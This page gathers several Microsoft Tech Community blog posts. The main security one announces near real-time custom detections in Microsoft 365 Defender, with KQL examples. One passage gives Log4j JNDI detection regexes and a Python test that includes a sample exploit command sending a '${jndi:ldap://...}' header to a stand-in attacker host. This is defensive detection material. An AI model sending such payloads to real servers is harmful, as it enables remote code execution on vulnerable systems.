by Contributed | Mar 14, 2023 | Technology

This article is contributed. See the original author and article here.

With the rapid advance of Generative AI, as demonstrated by Microsoft, folks are understandably excited! Generative AI holds tremendous promise for reducing the workload of content creation. For folks working on company intranets, organizational knowledge management, and more, the need for help is great. These teams are often understaffed and made up of people in part-time roles.

In this HLS Show Me How video, I show how organizations can begin to leverage Microsoft Bing Generative AI with Microsoft Viva… today! Specifically, I show how to enhance a Microsoft Viva Topics page with Generative AI content that can then be reviewed and edited. Although I show this within Topics, the same method applies anywhere in Microsoft Viva where content is authored, such as news in Connections.

*In this video I use the Developer Edition of Microsoft Edge. Literally as soon as I finished and went to post this from my production instance of Microsoft Edge, that edition was updated, and it now includes the Bing component with Generative AI!

Thanks for visiting – Michael Gannotti LinkedIn | Twitter

by Contributed | Mar 13, 2023 | Technology

Today we are excited to announce the public preview of near real-time custom detections in Microsoft 365 Defender. This new frequency will allow you to respond to threats faster with automated responses and gain valuable time in stopping attacks and protecting your organization.

Automation is key to keeping up with attackers

While Microsoft’s eXtended Detection and Response (XDR) solution helps prioritize response activities and provides a unified experience that allows for more effective investigation at the incident level, the increasing volume and speed of sophisticated attacks remain challenging.

That’s why automation is becoming an increasingly important tool in optimizing the SOC process. Automating response actions for common alerts can help you stay on top of threats, protect your organization more effectively, and reduce response times. If you want to get started in Microsoft 365 Defender, check out this post.

For effective protection, most organizations have custom detection mechanisms in place that are unique to the requirements of their environment. For these automations to be as effective as possible, however, the speed of detection is critical.

Detect in near real-time, respond in near real-time

To address the need for faster detection and response, we are thrilled to announce that you can now create custom detection rules that run in near real-time, in addition to the existing frequencies, which range from every 24 hours to every hour. These detections can be integrated with the broad set of Microsoft 365 Defender signals across email, endpoint, and identity, leading to faster response times and faster mitigation of threats.

This means your custom logic will run and evaluate all available signals and alerts faster than ever before and will trigger your predefined response action immediately, once a match is detected.





This new frequency will be available in Microsoft 365 Defender as Continuous (NRT). Image 1 shows the configuration wizard for custom detection rules in Microsoft 365 Defender and the various frequency options you can choose from, including near real-time (NRT).

Image 1: Custom detection wizard with the frequency dropdown open, showing the new Continuous (NRT) frequency.

When you configure a rule using the Continuous (NRT) frequency, the query is compared to every single event that gets into the service, and if there is a match, an alert is triggered. You can use the continuous frequency for queries referencing one table and using operators from the list of supported KQL operators.
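
Conceptually, a Continuous (NRT) rule behaves like a filter applied to each event as it arrives, rather than a query run over a batch on a schedule. The Python sketch below illustrates only that idea. It is not how the service is implemented, and the `Event` shape, the `rule_matches` predicate, and the `evaluate_stream` helper are hypothetical names made up for the illustration.

```python
from typing import Any, Callable, Dict, Iterable, Iterator

Event = Dict[str, Any]  # hypothetical event shape: column name -> value


def rule_matches(event: Event) -> bool:
    """Hypothetical single-table rule: a given subject line plus at least one URL."""
    subject = str(event.get("Subject", ""))
    url_count = int(event.get("UrlCount", 0))
    return "account has been suspended" in subject.lower() and url_count > 0


def evaluate_stream(events: Iterable[Event], rule: Callable[[Event], bool]) -> Iterator[Event]:
    """Check each incoming event on its own and yield an alert for every match."""
    for event in events:
        if rule(event):
            yield {"alert_for": event}


incoming = [
    {"Subject": "Weekly report", "UrlCount": 2},
    {"Subject": "This account has been suspended!", "UrlCount": 1},
    {"Subject": "This account has been suspended!", "UrlCount": 0},
]
alerts = list(evaluate_stream(incoming, rule_matches))
print(len(alerts))  # only the second event satisfies both conditions
```

Because each event is checked on its own as it arrives, a response action can start as soon as one event matches, without waiting for a scheduled run.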

Top use cases for custom detections and automated response actions

Monitoring for recent vulnerabilities

A common use case for near real-time custom detection rules that we see with customers is monitoring for events that might indicate threat activity related to a recently disclosed vulnerability. For instance, you can use the DeviceProcessEvents table to look for the malicious string needed to exploit the Log4j vulnerability and configure remediation actions to run automatically on targeted devices, such as initiating an investigation on the device:

DeviceProcessEvents

| where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop)://(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(/).*\}'

or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop)://(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(/).*\}'
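
Before deploying a pattern like this, it can help to run it against a few sample command lines. The sketch below does that with Python's `re` module, which is only a stand-in for the regex engine used by KQL, so treat the result as an approximation. The pattern is written with `$`, `{`, `}` and `.` backslash-escaped so that they match literally. The sample command lines and the `attacker.example.com` host are made up for the illustration.

```python
import re

# Log4j JNDI lookup pattern, split across lines for readability.
# $, {, } and . are escaped so they are treated as literal characters.
LOG4J_PATTERN = re.compile(
    r"(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop)://"
    r"(\$\{([a-z]){1,20}:([a-z]){1,20}\})?"
    r"(([a-zA-Z0-9]|-){2,100})?"
    r"(\.([a-zA-Z0-9]|-){2,100})?"
    r"\.([a-zA-Z0-9]|-){2,100}"
    r"\.([a-z0-9]){2,20}(/).*\}"
)

# Hypothetical command lines, for illustration only.
suspicious = "curl -H 'X-Api-Version: ${jndi:ldap://attacker.example.com/a}' http://intranet"
benign = "java -jar app.jar --config /etc/app/config.yml"

print(bool(LOG4J_PATTERN.search(suspicious)))
print(bool(LOG4J_PATTERN.search(benign)))
```

Note that, as written, the pattern expects a host with at least three dot-separated labels, so a lookup against a two-label host would not match.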

Detect and remove unwanted emails

Another use case is to look for unwanted emails that are not necessarily malicious but that the organization has defined as unwanted and wants removed automatically as soon as they are delivered. This empowers security admins to more easily manage mail flows from a security lens and can be done by configuring a Soft Delete remediation action:

EmailEvents

| where Subject contains "This account has been suspended!"

| where SenderFromAddress == "malicious@sender.com"

| where UrlCount > 0

Another scenario is to look for messages from a particular IP subnet that spoof the recipient, and to block this activity:

EmailEvents

| where SenderIPv4 startswith "xx.xx.xx." and SenderFromAddress == RecipientEmailAddress
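
The logic of this last query can be sketched in Python for illustration. The `startswith "xx.xx.xx."` prefix test effectively selects a /24 subnet, so the sketch uses the standard `ipaddress` module to express the same idea. The function name is hypothetical, `203.0.113.0/24` is a documentation-only placeholder range, and the case-insensitive address comparison is an assumption of this sketch (the `==` operator in the query is case-sensitive).

```python
import ipaddress


def is_self_spoof_from_subnet(event: dict, subnet: str) -> bool:
    """True when the sender IP is inside `subnet` and the From address equals the recipient."""
    network = ipaddress.ip_network(subnet)
    sender_ip = ipaddress.ip_address(event["SenderIPv4"])
    # Assumption: compare addresses case-insensitively, unlike the query's `==`.
    same_address = event["SenderFromAddress"].lower() == event["RecipientEmailAddress"].lower()
    return sender_ip in network and same_address


spoofed = {
    "SenderIPv4": "203.0.113.25",
    "SenderFromAddress": "Alice@contoso.com",
    "RecipientEmailAddress": "alice@contoso.com",
}
other_subnet = dict(spoofed, SenderIPv4="198.51.100.7")

print(is_self_spoof_from_subnet(spoofed, "203.0.113.0/24"))
print(is_self_spoof_from_subnet(other_subnet, "203.0.113.0/24"))
```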

Automation is critical to creating efficiencies in your SOC, but the speed of detection is fundamental to an effective response and keeping your organization safe.

The ability to define custom rules for near real-time detections is in public preview starting today and will enable your defenders to create effective response mechanisms with the breadth of Microsoft 365 Defender’s XDR signal across endpoints, email and more.

Learn more

- Check out our documentation and explore how near real-time custom detections can enhance your SOC’s detection and response processes.

- Wondering which tables are supported by near real-time detections? Find them here.

- Start automating your response actions today.

- Near real-time detections are available in public preview starting today. We would love to know what you think. Share your feedback with us in the Microsoft 365 Defender portal or by emailing AHfeedback@microsoft.com.

by Contributed | Mar 11, 2023 | Technology

How to Participate:

Step 1: Don’t miss this amazing opportunity: register for the Student Summit here

Step 2: Complete the Cloud Skills Challenge here: https://aka.ms/StudentSummitSouthAfrica

Step 3: Fill in the Official Rules Form: https://aka.ms/SSNGWPRules

Microsoft Student Summit Watch Party South Africa

When: Wednesday, March 22, 2023, 9:30 AM – 2:00 PM (GMT+02:00)

Where: Johannesburg, Gauteng, South Africa

Microsoft Student Summit is an event designed for students and rising developers who are passionate about technology and eager to learn new skills and meet like-minded individuals. Attending the Microsoft Student Summit can provide students with a number of benefits, including:

- Exposure to the Latest Technologies: The Microsoft Student Summit provides students with an opportunity to learn about and experience the latest Microsoft technologies, such as cloud computing and artificial intelligence.

- Microsoft Learn: The Microsoft Student Summit Cloud Skills Challenges are hands-on, allowing students to apply their knowledge and skills to real-world learning and challenges. This can be a valuable experience for students and rising developers who are looking to build their portfolios and demonstrate their abilities to future employers.

- Career Development: The Microsoft Student Summit can be a valuable resource for students who are interested in pursuing careers in technology. By attending the event, students can gain insights into the latest trends and innovations in the industry and connect with potential employers and recruiters.

Overall, the Microsoft Student Summit provides students and rising developers with a unique opportunity to learn and grow as individuals and technology professionals. Whether you are a beginner or an experienced technologist, the Microsoft Student Summit is a valuable investment in your future.

What is Student Summit?

Are you exploring a career in technology? Or looking to accelerate your technical career? Want to know what a “day in the life of” is really like before you dive in? Or get a jumpstart understanding the skills needed for success? Whether you are just starting your undergraduate degree or a seasoned professional curious about the tactical steps needed to accelerate your career, Microsoft Student Summit will help you discover how to gain expertise in today’s cutting-edge technology needed for your career.

What Will I Learn?

Tech

Discover the cutting edge of Application Development and Developer Tools; Low-Code / No-Code / Fusion Development; and AI, Data, and Machine Learning, and learn how to build your expertise. Start your learning journey with our Student Summit Cloud Skills Challenge.

Community

Tailored learning paths, upcoming networking events in your region, and invitations to join technical communities to help you deepen your technical expertise. Learn more at Microsoft Learn Student Hub.

Career

Career advice about how to start and accelerate your technical career from industry experts.

Additional Resources

Visit Microsoft Student Hub here: https://aka.ms/learnstudent

by Contributed | Mar 10, 2023 | Technology

Hello hello, everyone! Happy Friday!

Here’s a recap of what’s been going on in the MTC this week.

MTC Moments of the Week

To start things off, we want to first give a huge shoutout to this week’s MTC Member of the Week – @Kidd_Ip! Kidd is an MCT (Microsoft Certified Trainer) and full-time IT pro who has made great contributions to a variety of Tech Community forums across Azure and M365. Way to go, Kidd!

Moving to events, on Wednesday, we had our first of two AMAs. Azure Communication Services and Microsoft Teams joined forces for this event to talk about the possibilities of connecting Teams with the communication capabilities in Azure and the cool stuff we can build with it. A big thank you to our speakers @MilanKaur, @tchladek, and @dayshacarter for sharing your expertise!

Then on Thursday, we had our second AMA all about Windows Server – from upgrading older versions and the importance of regular updates, to the security features in the latest version of Windows Server (2022). We received a lot of questions, which were answered by our panel of speakers from the Windows Servicing and Delivery team as well as Windows Server engineers and security product managers. Shout out to @Artem Pronichkin, @Rick Claus, @Scottmca, @Ned Pyle, @Rob Hindman, and the rest of the team for a great session!

And over on the Blogs, in honor of Women’s History Month, the Marketplace Community kicked off a series of interviews with women leaders in the ISV community. The first edition of this series features an interview between @justinroyal and Harmke Alkemade, AI Cloud Solution Architect at Microsoft and Co-Founder at Friendly Flows. We love to see it!

Upcoming Events – Mark Your Calendars!

———-

For this week’s fun fact…

Did you know that the concept of what we know today as “Spring Break” (in the US, at least) began in 1936, when a college swimming coach, Sam Ingram, brought his team down from New York to Fort Lauderdale, Florida, to train? When the word got around to other swim coaches, they followed suit, and it began an annual pilgrimage for swimmers from across the US to enjoy the sun – and have some fun. The more you know!

Have a great weekend, everyone, and don’t forget to spring forward on Sunday!

by Contributed | Mar 10, 2023 | Technology

Welcome to the conclusion of our series on OpenAI and Microsoft Sentinel! Back in Part 1, we introduced the Azure Logic Apps connector for OpenAI and explored the parameters that influence text completion from the GPT-3 family of OpenAI Large Language Models (LLMs) with a simple use case: describing the MITRE ATT&CK tactics associated with a Microsoft Sentinel incident. Part 2 covered another useful scenario, summarizing a KQL analytics rule extracted from Sentinel using its REST API. In Part 3, we revisited the first use case and compared the Text Completion (DaVinci) and Chat Completion (Turbo) models. What’s left to cover? Well, quite a lot – let’s get started!

There is some incredible work happening every day by Microsoft employees, MVPs, partners, and independent researchers to harness the power of generative AI everywhere. Within the security field, though, one of the most important topics for AI researchers is data privacy. We could easily extract all entities from a Microsoft Sentinel incident and send them through OpenAI’s API for ChatGPT to summarize and draw conclusions – in fact, I’ve seen half a dozen new projects on GitHub just this week doing exactly that. It’s certainly a fun project for development and testing, but no enterprise SOC wants to export potentially sensitive file hashes, IP addresses, domains, workstation hostnames, and security principals to a third party without strictly defined data sharing agreements (or at all, if they can help it). How can we keep sensitive information private to the organization while still getting benefit from innovative AI solutions such as ChatGPT?

Enter Azure OpenAI Service!

Azure OpenAI Service provides REST API access to the same GPT-3.5, Codex, DALL-E 2, and other LLMs that we worked with earlier in this series, but with the security and enterprise benefits of Microsoft Azure. This service is deployed within your Azure subscription with encryption of data at rest and data privacy governed by Microsoft’s Responsible AI principles. Text completion models including DaVinci have been generally available on Azure OpenAI Service since December 14, 2022. While this article was being written, ChatGPT powered by the gpt-3.5-turbo model was just added to Preview. Access is limited right now, so be sure to apply for access to Azure OpenAI!
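
To make the REST access concrete, here is a minimal Python sketch that builds (but does not send) a text completion request against a resource in your own subscription. The resource name `contoso-soc`, the deployment name `davinci-summaries`, the key placeholder, and the `build_completion_request` helper are all hypothetical. The URL shape, the `api-key` header, and the `2022-12-01` API version reflect my understanding of the Azure OpenAI REST reference at the time of writing, so check the current documentation before relying on them.

```python
import json
import urllib.request


def build_completion_request(
    resource: str, deployment: str, api_key: str, prompt: str
) -> urllib.request.Request:
    """Build a POST request for a text completion deployment (nothing is sent here)."""
    # Assumed URL shape and API version; verify against the current REST reference.
    url = (
        f"https://{resource}.openai.azure.com/openai/deployments/"
        f"{deployment}/completions?api-version=2022-12-01"
    )
    body = json.dumps({"prompt": prompt, "max_tokens": 200, "temperature": 0.2})
    return urllib.request.Request(
        url,
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/json", "api-key": api_key},
        method="POST",
    )


request = build_completion_request(
    resource="contoso-soc",          # hypothetical Azure OpenAI resource name
    deployment="davinci-summaries",  # hypothetical model deployment name
    api_key="<your-key>",
    prompt="Summarize the MITRE ATT&CK tactic 'Lateral Movement' in two sentences.",
)
print(request.full_url)
# To actually call the service: urllib.request.urlopen(request)
```

The request targets an endpoint under your own resource name, which is the practical difference from calling a third-party API directly.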

ChatGPT on Azure solves a major challenge in operationalizing generative AI LLMs for use in an enterprise SOC. We’ve already seen automation for summarizing incident details, related entities, and analytic rules – and if you’ve followed this series, we’ve actually built several examples! What’s next? I’ve compiled a few examples that I think highlight where AI will bring the most value to a security team in the coming weeks and months.

- As an AI copilot for SOC analysts and incident responders, ChatGPT could power a natural language assistant interfacing with security operators through Microsoft Teams to provide a common operating picture of an incident in progress. Check out Chris Stelzer’s innovative work with #SOCGPT for an example of this capability.

- ChatGPT could give analysts a head start on hunting for advanced threats in Microsoft 365 Defender Advanced Hunting by transforming Sentinel analytic rules into product-specific hunting queries. A Microsoft colleague has done some pioneering work with ChatGPT for purple-teaming scenarios, both generating and detecting exploit code – the possibilities here are endless.

- ChatGPT’s ability to summarize large amounts of information could make it invaluable for incident documentation. Imagine an internal SharePoint with summaries on every closed incident from the past two years!

There are still a few areas where ChatGPT, as innovative as it is, won’t replace human expertise and purpose-built systems. Entity research is one such example; it’s absolutely crucial to have fully defined, normalized telemetry for security analytics and entity mapping. ChatGPT’s models are trained on a very large but still finite set of data and cannot be relied on for real-time threat intelligence. Similarly, ChatGPT’s generated code must always be reviewed before being implemented in production.

I can’t wait to see what happens with OpenAI and security research this year! What security use cases have you found for generative AI? Leave a comment below!
